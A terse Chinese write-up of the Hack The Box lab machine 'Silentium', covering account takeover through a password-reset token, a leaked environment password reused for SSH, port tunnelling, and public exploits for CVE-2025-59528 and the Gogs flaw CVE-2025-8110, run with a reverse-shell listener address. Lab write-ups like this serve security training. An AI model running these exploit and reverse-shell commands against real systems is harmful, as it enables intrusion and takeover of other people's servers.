【渗透测试】HTB Season10 Silentium 全过程wp
Silentium

信息收集

扫一下子域名 扫到staging.silentium.htb

我们抓个包试试


{"email":"ben@silentium.htb","password":"1"}
从报错信息看出,也就是说用户的邮箱是ben@silentium.htb
去抓一个忘记密码的包

可以得到teamToken


这里密码随便设置Password123!
然后进行登录即可

漏洞利用(CVE-2025-59528)
git clone https://github.com/AzureADTrent/CVE-2025-58434-59528.git


可以看到自己是在docker容器里

我们看一下env有没有什么泄露的

有个密码是r04D!!_R4ge我们ssh一下
ssh ben@10.129.197.47
r04D!!_R4ge

提权
看一下监听的端口

有服务开启了3001端口
代理出来
ssh -L 3001:127.0.0.1:3001 ben@10.129.197.47

我们注册一个看看

漏洞利用(CVE-2025-8110)
CVE-2025-8110 Gogs远程命令注入漏洞绕过分析与复现-先知社区
git clone https://github.com/Ghxstsec/CVE-2025-8110.git
其中脚本要改一下username 和 token


python3 CVE-2025-8110-RCE.py -u http://127.0.0.1:3001 -lh 10.10.16.17 -lp 6666 -p 'chenzi123'



浙公网安备 33010602011771号